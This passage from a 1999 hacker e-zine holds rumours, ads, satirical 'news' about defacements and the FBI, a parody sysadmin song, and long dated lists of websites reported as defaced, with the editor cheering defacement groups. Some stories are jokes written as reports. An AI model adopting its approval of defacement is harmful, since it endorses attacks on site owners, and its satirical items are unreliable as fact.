The report recommends that Europe adopts strong encryption technology
rather than restrict it and points out that it is the larger nations that
have invested in spying activities, leaving smaller nations vulnerable.
While few could object to these systems to apprehend criminals there
needs to be awareness of exactly what powers they give governments and law
enforcement. There also needs to be a way to ensure that they are being
used correctly. It has taken centuries to gain the right to privacy,
surely we should not throw it away so readily.
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]
@HWA
-=--=--=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-
T E R M U M L
H U O R I L
-=--=--=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-
Rumours:
~~~~~~~
Cartoon Hackers??
~~~~~~~~~~~~~~~~~~
New IRC Network
Contributed by siko
Monday - June 21, 1999. 06:27PM UTC
From www.innerpulse.com
Do you ever experience harsh channel takeovers? Get nuked all day long?
Get ridiculous spam directed your way? Hindered by immature skript kids?
Want more of the same? Come to Slacknet! You can point your IRC client
towards irc.slacknet.org, or irc.callcenterstech.net (server run by siko). Join
#slacknet when you connect for all questions, concerns, and propositions.
Slacknet IRC
http://www.slacknet.org
June 22nd 1999
From HNN http://www.hackernews.com/
contributed by delchi
WB Scraps 'Real Hackers' Cartoon
Rumor has it that Warner Brothers and Mattel have
scrapped an idea for a new Saturday morning cartoon
with a tie in toy line called "Real Hackers". The defunct
storyline was to portray a group of real life hackers in
cartoon form, reformed and fighting for good. Amongst
the hackers to be represented were 'phiber optik',
'bernie s', 'death veggie', 'emmanuel goldstein' and 'weld
pond' as cyber warriors as they fought criminals bent on
destroying the internet. It is unknown why Warner
Brothers and Mattel scrapped this idea or if it even
existed in the first place but in this hot pre Christmas
marketplace, one can only wonder how long it will be
before this ground breaking idea starts making money
for somebody.
Kasparov CheckMated?
~~~~~~~~~~~~~~~~~~~~
June 23nd 1999
From HNN http://www.hackernews.com/
contributed by Anonymous
Kasparov CheckMated?
A source close to the BBC has told us that they think
the World vs. Kasparov Chess match had been
compromised yesterday by cyber intruders. Evidently
the "World" playing against Kasparov had numerous
Kings on the board at once. HNN has received no
confiormation of this report. If anyone knows what
really went on we would like to hear it.
AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*****************************************************************************
* *
* ATTRITION.ORG http://www.attrition.org *
* ATTRITION.ORG Advisory Archive, Hacked Page Mirror *
* ATTRITION.ORG DoS Database, Crypto Archive *
* ATTRITION.ORG Sarcasm, Rudeness, and More. *
* *
*****************************************************************************
www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
m www.2600.com ########################################ww.2600.com www.freeke
vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick.
com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free
kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic
k.com www.2600.########################################om www.2600.com www.fre
ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre
www.2600.com
One of our sponsers, visit them now www.csoft.net
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to //
// hwa@press,usmc.net, put AD! in the subject header please. - Ed //
//////////////////////////////////////////////////////////////////////////////
@HWA
HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~
Don't worry. worry a *lot*
Send in submissions for this section please! .............
www.innerpulse.com is back. heres a couple of ditties from them;
Local Hacker Lays Smack Down on Inferior Hacker
Contributed by siko
Wednesday - June 23, 1999. 04:48PM UTC
The chilling tale of hacker on hacker violence unfolded in the small IRC
channel #hackphreak on Undernet this afternoon as a hacker calling himself
'clocker' explained the events.
"It all started when this kid who can't possibly have more of an IQ than 80
started telling me about how he was a hacker. I had to smack him in the face.
He said Linux was an ISP like AOL."
The drama entailed many reactions. Some were in fear for their own safety
from this "Hacker Enforcer". One hacker was later accused by clocker of
"running windows".
The hacker, clocker, was not available for comment. His mother made him
clean his room.
Hacker's Continue to Retaliate
Contributed by siko
Tuesday - June 22, 1999. 03:42AM UTC
Two new groups have stood up in the battle against the extreme injustice
of the FBI raiding several computer hackers that admitted to committing high
crimes. Early this morning, minix.closet.jpl.nasa.gov was cracked by a hacker
exploiting an unknown hole in the qpopper pop3 daemon. Version 2.43b4 of
the mail server was thought to be secure.
m0nk3yz 4 L1f3 left the following message on the cracked server:
We are not jsut kids here doing this attakc thign. Their is no reasen for
thinking we are young and not dangarous. We will keap hitting every
.gov on the NET until the FBI comes crying on they're nees. Fear us.
The second group, Niggaz With Attitude AND Computahz, completed a
large portscan of www.fbi.gov.
"I think they left their firewall port open, so we plan on netbussing the router
so we can gain access to the lan and audit the internal security removing the
firewall and changing the index.html.". explained uberklown. "By simply
bypassing their network sockets we can go over to commands, drop down
to nuke.. and hope from there on out."
Innerpulse caught up with Albert Renford, director of Network Security at
the FBI.
INNERPULSE So when did you first realize you were going to get
attacked by skilled crackers from across the globe?
AL RENFORD Well we first detected a lot of connection attempts to our
telnet port. I learned about password security at a trade show I attended in
LA and had recently changed my root password from 'sex' to something
more difficult. After the rash of failed logins, we began to notice a fluxuation
in the amount of connections to port 139 we were getting. Something about
oob or something. Weird.
INN So what would you rate this threat on a scale of 1-10?
AR Obviously its a 10. We are dealing with professional system crackers,
cracking into servers with loads of sensitive data on them. You can't find
exploits anywhere!
IPP Have you ever visited rootshell.com?
AR ?
Attrition
http://www.attrition.org/
Hacker News Network
http://www.hackernews.com
Song sung to the tune of "I'm the very model of a modern major general"
from: http://www.harley.com/harley-quotes/unix-sysadmin.html
by Harley Hahn
Unix Sysadmin:
I am the very model of a modern Unix Sysadmin,
I've information relevant to programs in slash usr bin,
I know the tricks of emacs and the vi bugs historical,
From a to ZZ upper case, in order categorical;
I'm very well acquainted too with matters of the interface,
I understand commands of pine, and how they hurt the human race.
About the pico editor I'm teeming with a lot o' bosh –
With many cheerful facts of how it's dumber than a Macintosh.
Everyone:
With many cheerful facts of how it's dumber than a Macintosh.
Unix Sysadmin:
I'm very good at showing users how to pick the best of tools,
I know I should avoid the nerds who hang out in the vestibules;
In short, in matters relevant to programs in slash usr bin,
I am the very model of a modern Unix Sysadmin.
Everyone:
In short, in matters relevant to programs in slash usr bin,
He is the very model of a modern Unix Sysadmin.
-=-
@HWA
SITE.1
@HWA
H.W Hacked websites
~~~~~~~~~~~~~~~~
Note: The hacked site reports stay, especially with some cool hits by
groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed
* Hackers Against Racist Propaganda (See issue #7)
Haven't heard from Catharsys in a while for those following their saga visit
http://frey.rapidnet.com/~ptah/ for 'the story so far'...
From HNN rumours section http://www.hackernews.com/
see the archives section on HNN or attrition.org for copies of many of these
sites in their defaced form.
http://www.attrition.org/
contributed by Anonymous
Cracked
Yet another busy weekend. The following sites have
been reported to HNN as being cracked.
http://www.chatuk.co.uk
http://maif.gov
http://www.freakstudios.com
http://cenwo.nwo.usace.army.mil
http://www.qplanet.com
http://www.qplanet.net
http://www.gccnj.edu
http://www.panthersfootball.com
http://www.atlantabravesbaseball.com
http://rsd.gsfc.nasa.gov
http://www.bbutx.com
http://fusion.library.mssm.edu
http://www.depaul.edu
http://www.jinxcorp.com
http://www.fweebsd.org
http://www.landersoil.com
http://www.naturalbornassholes.com
http://www.rug.ac.be
http://sun.vdp.fr
June 8th
contributed by Anonymous Cracked
http://www.zms.or.jp
http://nt.oneworld.org
http://icg.clarkson.edu
June 9th
contributed by Anonymous
Cracked
The following sites have been reported as being cracked.
http://kln.gov.my
http://www.landfield.com
http://www.420.net
http://www.me.fau.edu
http://www.zms.or.jp
http://nt.oneworld.org
http://icg.clarkson.edu
June 10th
contributed by Anonymous
Cracked The following sites have been reported as
cracked.
http://www.joshcomm.com
http://www.usd.edu
http://www.ioc.state.il.us
http://www.alloweb.com
http://www.coollinux.com
June 11th
contributed by Anonymous
Cracked
Things seem to have slowed down a little recently. HNN
has only received reports that three web sites have been cracked.
http://programmingjunkies.com/
http://sol.marc.usda.gov
http://index.ecu.edu
June 14th
contributed by Anonymous
Cracked
The following sites where reported as cracked over the
weekend.
http://www.garufa.com
http://www.ancort.ru
http://www.cdiunesco.org.ar
http://www.cenidet.edu.mx
http://www.galvash.com.mx
http://www.naboodesigns.cx
http://www.foxintl.com
http://www.bbay.com
http://mail.edomex.gob.mx
http://www.matrix.msu.edu
http://index.ecu.edu
June 15th
contributed by Anonymous
Cracked
X-PLOIT TEAM has returned with reported cracks of
Mexican Government web sites as they continue to fight
against corrupt government, and for freedom of speech.
http://www.edomorelos.gob.mx
June 16th
contributed by Anonymous
Cracked
Things have seemed to be a little slow lately. Maybe
because it is summertime. With the new IIS hole things
will probably pick up. These are the sites that have
been reported as cracked.
http://www.skinheads.com
http://www.softlink.cz
http://rs-nt-1.une.edu.au
http://virtual.lead.org
http://www.shoot-n-iron.com
http://www.zophar.com
June 17th
contributed by Anonymous
Cracked The following sites have been reported as
cracked.
http://data3.gmu.edu
http://www.highplaces.org
http://ellzeymarine.com
http://multilinkcom.com
http://orion.web-hosting.com
http://www.exo2060.com
http://www.justmark.com
June 18th
contributed by Anonymous
Cracked
http://www.flavoredthunder.com
http://nc-101.hypermart.net
http://www.hansatreuhand.de
http://www.aj.com
http://www.wabba.com
June21st
Cracked
It looks like it has been a busy weekend for some. The
following sites have been reported as cracked. (Note:
There are two .mil domains in this list.)
http://www.metro.seoul.kr
http://pindar.ilt.columbia.edu
http://www.fpac.fsu.edu
http://www.gis.dk
http://cob-distance02.colorado.edu
http://shadowflax.cs.byu.edu
http://www.castnetcom.com
http://www.ies.ncsu.edu
http://www.ruckstuhlgaragen.ch
http://www.bpfa.com
http://www.catalogcafe.com
http://www.des.uwm.edu
http://insite.net
http://www.wabba.com
http://www.bisnet.scsu.edu
http://rs-nt-1.une.edu.au
http://www.cityhackers.com
http://www.hsd401.org
http://fjsrc.urban.org
http://www.communityofcaring.org
http://lhi5.ifsm.umbc.edu
http://uhec.udmercy.edu
http://www.earthforce.org
http://www.e-lawyers.net
http://www.dancinghands.com
http://www.coolkids.com
http://www.aggerholm.com
http://www.canada.org.mx
http://www.mightymedia.com
http://www.wib.lehigh.edu
http://www.nswcl.navy.mil
http://www.ntsc.navy.mil
http://armstrong.scu.edu
http://uhec.udmercy.edu
http://www.ameralert.com
http://www.autosportmag.com
http://www.futuristicsound.com
http://www.lyndalong.com
http://www.netpay321.net
http://www.ohioagent.com
http://www.showcase-newhomes.com
http:/www.eurobasket99.com
http:/plan.arch.usyd.edu.au
http:/bluesroom.co.za
http:/seekerz.co.za
http:/www.good-design.com
http:/www.xpandcorp.com
June 22nd
contributed by Anonymous
Cracked
The following sites have been reported as cracked.
http://lhi5.umbc.edu
http://www.reg.niu.edu
http://mnyouth.org
http://www.dynamic-21.com
http://www.ergointerfaces.com
http://www.salcotoys.com
http://www.teachertalk.com
http://www.usd.edu
June 23rd
Cracked
The following sites have been reported to us as
compromised.
http://hpws3.ihep.ac.cn
http://www.atljf.org
http://www.121trade.com
http://www.bizzcity.com
http://www.internetgate.com
http://www.nflgameday.com
http://www.orgplanning.com
http://www.thanks-cgi.com
http://observer.gsfc.nasa.gov
http://www.ipub.com
June 24th
contributed by Anonymous
Cracked
The following sites have been reported as cracked.
http://www.5aday.gov
http://www.kukje.co.kr
http://www.drysound.com
http://www.internet-club.com
http://www.justmark.com
http://www.thanks-cgi.com
June 25th
contributed by Anonymous
Cracked The following sites have been reported as
Cracked:
http://www.cpr-training.com
http://www.magnaflow.com
http://www.library.anl.gov
http://www.industrialbikes.com
http://www.monmouth.army.mil
http://www.sterzing.com
http://www.unicef.org.ar
http://cis.georgefox.edu
http://arcvirtualcampus.org
http://www.musclecars.org
http://www.habaco.com
http://www.iphase.com
http://www.arkon.net
http://www.art-by-kaki.com
http://www.dcclan.com
http://www.heckerdesign.com
http://www.nlac.gov.tw
http://www.pixeled.com
http://www.twilightsoftware.com
http://www.cpac.org
http://www.forpc.com.au
http://www.orgplanning.com
http://www.nethelpnow.com
http://www.appliedcls.com
http://www.craigcph.com
http://www.damascusbakery.com
-------------------------------------------------------------------------
A.0 APPENDICES
_________________________________________________________________________
A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The links are no longer maintained in this file, there is now a
links section on the http://welcome.to/HWA.hax0r.news/ url so check
there for current links etc.
The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
hack-faq
Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html
Original jargon file
New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/
New jargon file
HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://packetstorm.genocide2600.com/hwahaxornews/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~
Foreign correspondants and others please send in news site links that
have security news from foreign countries for inclusion in this list
thanks... - Ed
Belgium.......: http://bewoner.dma.be/cum/
Go there
Brasil........: http://www.psynet.net/ka0z
Go there
http://www.elementais.cjb.net
Go there
Columbia......: http://www.cascabel.8m.com
Go there
http://www.intrusos.cjb.net
Go there
Indonesia.....: http://www.k-elektronik.org/index2.html
Go there
http://members.xoom.com/neblonica/
Go there
http://hackerlink.or.id/
Go there
Netherlands...: http://security.pine.nl/
Go there
Russia........: http://www.tsu.ru/~eugene/
Go there
Singapore.....: http://www.icepoint.com
Go there
Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine.
Go there
Got a link for this section? email it to hwa@press.usmc.net and i'll
review it and post it here if it merits it.
@HWA
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
© 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t }
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]
+++ ATH0